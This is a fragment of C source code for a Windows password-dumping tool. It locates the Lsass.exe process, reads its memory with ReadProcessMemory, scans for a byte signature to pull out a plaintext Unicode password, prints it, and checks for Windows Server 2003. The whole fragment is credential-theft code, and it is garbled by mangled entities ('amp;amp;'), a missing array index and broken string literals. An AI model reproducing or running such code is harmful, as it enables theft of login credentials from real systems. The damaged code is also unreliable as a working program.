if (i < nSize) { ZeroMemory(Password,sizeof(Password)); for (; i < nSize ; i++) { if (Buffer == 0x02 amp;amp; Buffer[i + 1] == 0 amp;amp; Buffer[i + 2] == 0 amp;amp; Buffer[i + 3] == 0 amp;amp; Buffer[i + 4] == 0 amp;amp; Buffer[i + 5] == 0 amp;amp; Buffer[i + 6] == 0) { /* The Below Code Is To Retrieve The Password.Since The String Is In Unicode Format,So We Will Do It In That Way */ j = i + 7; for (; j < nSize; j += 2) { if (Buffer[j] > 0) { Password[Count++] = Buffer[j]; } else { break; } } return i + 7; // One Flag To Indicate We Find The Password } } } return -1; // Well,We Fail To Find The Password,And This Always Happens } // End Search
if( !Process32First(hProcessSnap, pe32)) { CloseHandle(hProcessSnap); // Must clean up the snapshot object! return 0; }
do { if (strcmpi(pe32.szExeFile,"Lsass.EXE") == 0) { PID = pe32.th32ProcessID; break; } }while(Process32Next( hProcessSnap, pe32));
CloseHandle( hProcessSnap); return PID; } // End GetLsassPID()
//------------------------------------------------------------------------------------ // Purpose: To Find The Password // Return Type: BOOLEAN // Parameters: // In: DWORD PID -> The Lsass.exe"s PID //------------------------------------------------------------------------------------ BOOL FindPassword(DWORD PID) { HANDLE hProcess = NULL; char Buffer[5 * 1024] = ; DWORD ByteGet = 0; int Found = -1;
hProcess = OpenProcess(PROCESS_VM_READ,FALSE,PID); // Open Process if (hProcess == NULL) { printf("Fail To Open Process
"); return FALSE; }
if (!ReadProcessMemory(hProcess,(PVOID)BaseAddress,Buffer,5 * 1024,amp;ByteGet)) // Read The Memory From Lsass.exe { printf("Fail To Read Memory
"); CloseHandle(hProcess); return FALSE; }
CloseHandle(hProcess);
Found = Search(Buffer,ByteGet); // Search The Password if (Found >= 0) // We May Find The Password { if (strlen(Password) > 0) // Yes,We Find The Password Even We Don"t Know If The Password Is Correct Or Not { printf("Found Password At #0x%x -> "%s"
",Found + BaseAddress,Password); } } else { printf("Fail To Find The Password
"); } return TRUE; } // End FindPassword
//------------------------------------------------------------------------------------ // Purpose: Check If The Box Is Windows 2003 // Return Type: BOOLEAN // Parameters: None //------------------------------------------------------------------------------------ BOOL Is2003() { OSVERSIONINFOEX osvi; BOOL b0sVersionInfoEx; ZeroMemory(amp;osvi,sizeof(OSVERSIONINFOEX)); osvi.dwOSVersionInfoSize=sizeof(OSVERSIONINFOEX);
if (!(b0sVersionInfoEx=GetVersionEx((OSVERSIONINFO *)amp;osvi))) { osvi.dwOSVersionInfoSize=sizeof(OSVERSIONINFO); } return (osvi.dwMajorVersion == 5 amp;amp; osvi.dwMinorVersion == 2); } // End Is2003() // End Of File